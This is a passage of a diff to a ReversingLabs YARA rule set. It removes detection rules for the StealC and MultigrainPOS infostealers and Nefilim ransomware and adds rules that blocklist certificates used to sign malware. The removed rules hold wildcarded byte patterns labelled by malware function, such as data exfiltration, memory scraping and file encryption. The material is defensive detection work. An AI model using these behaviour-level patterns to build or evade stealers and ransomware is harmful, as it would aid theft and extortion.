-            11 ?? 3A ?? ?? ?? ?? 00 DE ?? 11 ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 ?? 2C ??
-            11 ?? 6F ?? ?? ?? ?? 00 00 DC 08 0B DE ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00
-            07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 07 17 8D ?? ?? ?? ?? 13 ?? 11 ??
-            16 1F ?? 9D 11 ?? 6F ?? ?? ?? ?? 17 9A 16 8D ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 0B 00 07 0A 2B ?? 06
-        }
-		$get_browser_history = {
-            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
-            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
-            13 ?? 2B ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26
-            08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 00 11 ?? 17
-            D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 31 ?? 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $get_browser_autofill_data ) and ( $get_browser_cookies ) and ( $take_screenshot ) and ( $get_antivirus_information ) and ( $get_browser_history )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ok.com" and pe.signatures [ i ] . serial == "04:30:52:95:6e:1e:6d:bd:5f:6a:e3:d8:b8:2c:ad:2a:2e:d8" and 1662149613 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Infostealer_Stealc : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Dbc03Ca7E6Ae6Db6 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects StealC infostealer."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b53bbf15-3e94-513c-91a9-83dda421063b"
-		date = "2023-06-07"
-		modified = "2023-06-07"
+		id = "a5ac5da6-0bb0-5327-ac3a-b53d2f103fe6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/infostealer/Win32.Infostealer.StealC.yara#L1-L57"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bea1cf370150387eb185deff726e10e660e7eb571c20d22878def08b36f457bf"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11008-L11026"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0077b9c46ddd98a4929878ba4ba9476ed7fb1d7bf6e30c3ae0f950445d01e8f3"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "StealC"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$resolve_windows_api = {
-            55 8B EC 51 83 65 ?? ?? 56 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 00 8B 40 ??
-            89 45 ?? 8B 75 ?? 89 35 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35
-        }
-		$load_sqlite3_functions = {
-            55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 50 89 45 ?? 89 4D ?? 8B 4D ?? 8D
-            45 ?? 50 89 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 45 ?? 57 89 45 ?? 8B 7D ??
-            B9 ?? ?? ?? ?? 33 C0 F3 AA 5F 33 C0 C9 C3 8B 45 ?? 85 C0 74 ?? 53 8B 58 ?? 56 8B 70
-            ?? FF 35 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ??
-            A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3
-        }
-		$check_license_expiration_date = {
-            55 8B EC 83 E4 ?? 83 EC ?? 57 33 C0 66 89 44 24 ?? 83 64 24 ?? ?? 8D 7C 24 ?? AB AB
-            AB 66 AB 33 C0 66 89 44 24 ?? 8D 7C 24 ?? AB AB AB 66 AB 33 C0 21 44 24 ?? 8D 7C 24
-            ?? AB 8D 7C 24 ?? AB 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 8D
-            4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ??
-            8B 44 24 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ??
-            8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 3B 44 24 ?? 72 ?? 77 ??
-            8B 44 24 ?? 3B 44 24 ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $resolve_windows_api ) and ( $load_sqlite3_functions ) and ( $check_license_expiration_date )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIDER DEVELOPMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:db:c0:3c:a7:e6:ae:6d:b6" or pe.signatures [ i ] . serial == "db:c0:3c:a7:e6:ae:6d:b6" ) and 1600826873 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Infostealer_Multigrainpos : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7D27332C3Cb3A382A4Fd232C5C66A2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MultigrainPOS infostealer."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "595c04af-802f-556d-b22b-23cac79b256e"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "d8390528-ff27-514d-ab89-fd563a19ce3c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/infostealer/Win32.Infostealer.MultigrainPOS.yara#L1-L88"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9808c95b850a54677c4132057b8372cabf0159920b7e0e6834a83f0d39c088fa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11028-L11044"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c1c50015db7f97b530819b40e2578463a6021bfff8e2582858a4c3fbd1a9b9bc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "MultigrainPOS"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$data_exfiltration_v10_1 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 1D ?? ?? ?? ?? 56 57 8B 3D ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F
-            43 45 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81
-            FE ?? ?? ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 75 ?? 83 7D ?? ?? 5F 5E 5B 72 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 CD B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ??
-            FF 75 ?? FF D7 68 ?? ?? ?? ?? FF D3 EB
-        }
-		$memory_scraping_v10_1 = {
-            6A ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? EB ?? 3C ?? 7C ?? 3C ?? 7E ?? 8A 46 ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 74
-        }
-		$process_search_v10_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 1D ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? 8D
-            85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75
-        }
-		$service_creation_v10_1 = {
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 5E 8B 4C 24 ?? 33 CC E8 ?? ??
-            ?? ?? 8B E5 5D C3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            FF 15
-        }
-		$process_search_v11_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8B 7D ?? FF 15 ??
-            ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 8D 49 ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ??
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF D3 EB ?? 8D 8D
-            ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 66 89
-            85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 EB ?? 8D A4 24 ??
-            ?? ?? ?? EB ?? 8D 49 ?? 0F B7 84 0D ?? ?? ?? ?? 66 89 84 0D ?? ?? ?? ?? 8D 49 ?? 66
-            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-        }
-		$memory_scraping_v11_1 = {
-            6A ?? 56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 6A ??
-            56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8
-        }
-		$data_exfiltration_v11_1 = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8A 5D ?? 56 57 8B 3D ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F 43 45 ??
-            6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81 FE ?? ??
-            ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 74 ?? 84 DB 74 ?? 33 F6 83 7D ?? ?? 72 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ??
-            FF 75 ?? FF D7 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 84 DB 74 ?? EB ?? BE ?? ?? ?? ?? EB
-        }
-		$service_creation_v11_1 = {
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 4C 24 ?? 33 CC E8 ?? ?? ??
-            ?? 8B E5 5D C3 8D 44 24 ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $data_exfiltration_v10_1 and $memory_scraping_v10_1 and $process_search_v10_1 and $service_creation_v10_1 ) or ( $process_search_v11_1 and $memory_scraping_v11_1 and $data_exfiltration_v11_1 and $service_creation_v11_1 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures [ i ] . serial == "7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" and 1655424000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Nefilim : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_82D224323Efa65060B641F51Fadfef02 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Nefilim ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aec298c1-abf8-5446-9dbb-795f9fcf8e94"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "166949cf-dbff-5713-950e-46d1f3edc61f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Nefilim.yara#L1-L150"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fae0350e51aee2777475d2222848b30fd39fa39ceea260132b0c7fbc536b3a86"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11046-L11064"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9d361c91ed24b6c20a7b35957e26f208ce8e0a3d79c5a6fed6278acd826ccf49"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Nefilim"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$create_encryption_key = {
-            55 8B EC 51 A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 56 50 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
-            ?? 8B F0 A1 ?? ?? ?? ?? 59 89 75 ?? 73 ?? B8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 33 F6 59 59 39 35 ?? ?? ?? ?? 75 ?? 53 57 8B 3D ?? ?? ?? ?? 56 6A ?? 56 BE
-            ?? ?? ?? ?? 56 BB ?? ?? ?? ?? 53 FF D7 85 C0 75 ?? 6A ?? 6A ?? 50 56 53 FF D7 85 C0
-            75 ?? 50 FF 15 ?? ?? ?? ?? 5F 33 F6 5B A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 68 ?? ?? ??
-            ?? 56 56 50 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 EB ?? 5E C9
-            C3
-        }
-		$encrypt_encryption_key = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 83 78 ?? ?? 59 72 ?? 8B 00 53 56 57 33 DB 53 53 6A ?? 53 53 68 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 39 5D ?? 0F 84
-            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B
-            C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 50 57 E8 ?? ??
-            ?? ?? 59 59 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 89 45 ?? 8D 45 ?? 50 56 6A
-            ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? FF 15 ?? ?? ??
-            ?? 8D 45 ?? 50 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 50 56 FF 75 ?? FF 15 ??
-            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 83 7D ?? ?? 8B 45 ?? 53
-            56 57 73 ?? 8D 45 ?? 33 DB 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89
-            44 24 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ??
-            6B C0 ?? 83 C0 ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? 89 44 24 ??
-            E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? BE
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 56 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ??
-            89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ??
-            ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 7E ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ??
-            33 FF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 53 53 FF 74 24 ?? FF 74 24 ??
-            FF 74 24 ?? FF D7 53 FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ??
-            FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 53 03 C6 53 13 CB 51 50 FF 74 24 ??
-            FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B
-        }
-		$encrypt_files_p2 = {
-            4C 24 ?? 53 05 ?? ?? ?? ?? 53 13 CB 51 50 FF 74 24 ?? FF D7 53 E8 ?? ?? ?? ?? 0B C2
-            59 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ??
-            ?? ?? 8B 3D ?? ?? ?? ?? 53 8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 74
-            24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9
-            ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ??
-            3B CB 0F 86 ?? ?? ?? ?? BE ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 2B 4C 24 ?? 1B 44 24 ?? 89
-            44 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 53 FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 53 FF 74 24 ?? 89 44 24 ?? FF 74 24 ?? FF 74 24 ??
-            FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B
-            54 24 ?? 51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF
-            74 24 ?? FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? FF 74 24 ?? 53 50 FF 15 ?? ?? ?? ?? 81 44 24 ?? ?? ?? ?? ?? 8B 44 24 ??
-            11 5C 24 ?? 39 44 24 ?? 0F 8C ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B 4C 24 ?? 39 4C 24 ??
-            0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F
-        }
-		$encrypt_files_p3 = {
-            86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 59 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 FF 74 24 ?? FF D7 53
-            8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ??
-            51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 50 FF 74 24 ?? FF D7 53 8D
-            44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ??
-            59 E9 ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? FF 15 ??
-            ?? ?? ?? 53 53 33 C0 50 53 FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24
-            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24
-            ?? 8B 54 24 ?? 51 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 53
-            FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ?? ??
-            ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ??
-            E8 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ??
-            E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 45 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 83 7D ?? ?? 8B
-            4D ?? 73 ?? 8D 4D ?? 50 51 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ??
-            6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$find_files_1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56
-            57 6A ?? 5E 33 C0 33 FF 6A ?? 66 89 44 24 ?? 57 8D 45 ?? 8D 4C 24 ?? 89 74 24 ?? 89
-            7C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 66
-            89 44 24 ?? 66 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 03 44 24 ?? 8D 4C 24 ?? 89 74 24 ??
-            89 7C 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 57 8D 44 24 ?? 50 83 C8 ?? 8D 74
-            24 ?? E8 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 83 C8 ?? E8 ?? ?? ?? ?? 8B DE 8D 44
-            24 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24
-            ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
-        }
-		$find_files_2 = {
-            D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? F6
